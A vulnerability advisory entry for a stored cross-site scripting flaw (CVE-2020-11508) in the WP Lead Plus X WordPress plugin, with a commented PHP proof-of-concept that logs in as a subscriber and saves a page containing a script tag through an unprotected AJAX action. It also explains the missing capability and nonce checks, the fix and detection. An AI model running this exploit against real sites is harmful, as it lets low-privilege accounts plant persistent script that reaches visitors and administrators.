WP Lead Plus X < 0.99 - Authenticated Stored Cross-Site Scripting (XSS)



Description
WP Lead Plus X is a WordPress plugin that allows site owners to create custom landing and “squeeze” pages, complete with its own page builder interface capable of inserting custom JavaScript. Unfortunately, this page builder interface also relied on an unprotected AJAX action, core37_lp_save_page, which saves and updates pages but lacked both a capability check and a nonce check.
Proof of Concept
<?php
// Proof of concept for the stored XSS described above (CVE-2020-11508, WPVDB 10167).
//
// Flow: (1) authenticate against wp-login.php as a low-privilege (subscriber)
// account, (2) reuse the resulting session cookies to POST to
// wp-admin/admin-ajax.php with action=core37_lp_save_page, which persists a
// page whose content includes a <script> element.
//
// Root cause (per the description): the AJAX handler for core37_lp_save_page
// performs neither a capability check nor a nonce check, so any authenticated
// user can create or overwrite pages. The plugin-side fix is to gate the
// handler on an appropriate editing capability (current_user_can) and verify a
// nonce (check_ajax_referer) before saving. Defenders can look for POSTs to
// admin-ajax.php carrying action=core37_lp_save_page from accounts that should
// not be able to edit pages.
//
// NOTE(review): the database entry lists this PoC as "Verified No"; the exact
// request shape below should be treated as the researcher's reproduction,
// not as confirmed against every affected version.

// Settings
$url = $argv[1]; //URL of the site
$wp_user = $argv[2]; //Subscriber Username
$wp_pass = $argv[3]; //Subscriber Password
$urlbits = parse_url($url);

// Only scheme and host are kept; any path or port in $argv[1] is discarded,
// so the requests always go to the host root.
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

// Log in as subscriber
// Cookies are written to a temp file so the second request can reuse the
// session. NOTE(review): the temp file is never removed, and neither the
// curl_exec() return value nor the login response is checked — the script
// continues to the save request even if authentication failed.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-login.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
// Standard wp-login.php form fields.
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'wp-submit'  => 'Log+In',
    'testcookie' => '1'
)));
$output = curl_exec($ch);
curl_close($ch);

//Insert a page with stored XSS
// pageContent is the page builder's rendered markup, already percent-encoded,
// containing a "code" element whose body is a <script> tag. pageSettings is
// the builder's model JSON for the same elements; its "code" entry carries the
// same encoded script. http_build_query() will percent-encode these values a
// second time, so the plugin presumably URL-decodes them itself — verify
// against the plugin's save handler.
$params=array(
'pageContent' => "%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-lp-172110%22%20style%3D%22width%3A%20700px%3B%22%20class%3D%22c37-lp%20c37-step%20ui-sortable%20ui-droppable%22%3E%0A%20%20%20%20%3Csection%20class%3D%22c37-section%20ui-sortable%20ui-droppable%22%20id%3D%22c37-section-643520%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-row%20d-flex%20flex-row%22%20id%3D%22c37-row-326243%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-col-md-12%20c37-col-sm-12%20c37-col-12%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-box-865567%22%20class%3D%22c37-box%20flex-column%20d-flex%20flex-column%20ui-sortable%20ui-droppable%22%3E%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%3Cdiv%20data-original%3D%22false%22%20data-c37-type%3D%22code%22%20class%3D%22c37-lp-element%20c37-item-element%20ui-draggable-handle%22%20id%3D%22c37-code-108583%22%3E%0A%20%20%20%20%3Cdiv%20data-content%3D%22%22%20class%3D%22c37-code-container%22%3E%3Cscript%3Ealert('xss!')%3B%3C%2Fscript%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%0A%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%20%20%20%20%3C%2Fsection%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20",
// Optional 4th argument: an existing page ID to overwrite; defaults to '0'
// (presumably "create a new page" — confirm against the plugin).
'pageID' => isset($argv[4]) ? $argv[4] : '0',
'pageSlug'=>'poctest',
'pageTitle' => 'PoCTest',
'pageSettings' => '{"isVariant":false,"isPage":true,"variantPageID":0,"webFonts":[],"modelsJSON":{"c37-section-643520":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","layout":12,"containerClass":"","etype":"section","editingElementID":"c37-section-643520"},"c37-row-326243":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","layout":"12","etype":"row","editingElementID":"c37-row-326243"},"c37-box-865567":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","size":{"desktop":12,"tablet":12,"phone":12},"direction":"flex-column","etype":"box","editingElementID":"c37-box-865567"},"c37-code-108583":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","code":"%3Cscript%3Ealert(\'xss!\')%3B%3C%2Fscript%3E","etype":"code","editingElementID":"c37-code-108583"},"page":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"deskto
p":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","width":"700","codes":{"trackingCode":"","experimentCode":"","beforeBodyClosing":"","afterBodyOpening":"","metaCode":"","customCSSCode":""},"pageTitle":"PoC","pageSlug":"poc","weight":"1","cssID":"c37-lp-172110","editingElementID":"page","etype":"page"}},"flipCountdown":{},"simpleCountdown":{},"previewURL":"","imageSliders":{},"weight":1,"elementsActions":{},"jsCodes":{},"compiledCSS":""}',
// The vulnerable AJAX action; no nonce field is sent because the handler does
// not require one.
'action' => 'core37_lp_save_page'
);
// Second request: same cookie jar, so the subscriber session from the login
// above is presented to admin-ajax.php.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-ajax.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8', 'Connection: close'));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
// The raw handler response is echoed without inspection; a failed save looks
// the same as a successful one unless the output is read.
$output = curl_exec($ch);
echo $output;
curl_close($ch);

Affects Plugin

References

CVE 2020-11508
URL https://www.wordfence.com/blog/2020/04/critical-vulnerabilities-in-the-wp-lead-plus-x-wordpress-plugin/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ramuel Gall (Wordfence)
Submitter Ramuel Gall
Views 1322
Verified No
WPVDB ID 10167

Timeline

Publicly Published 2020-04-07 (about 2 months ago)
Added 2020-04-07 (about 2 months ago)
Last Updated 2020-04-08 (about 2 months ago)
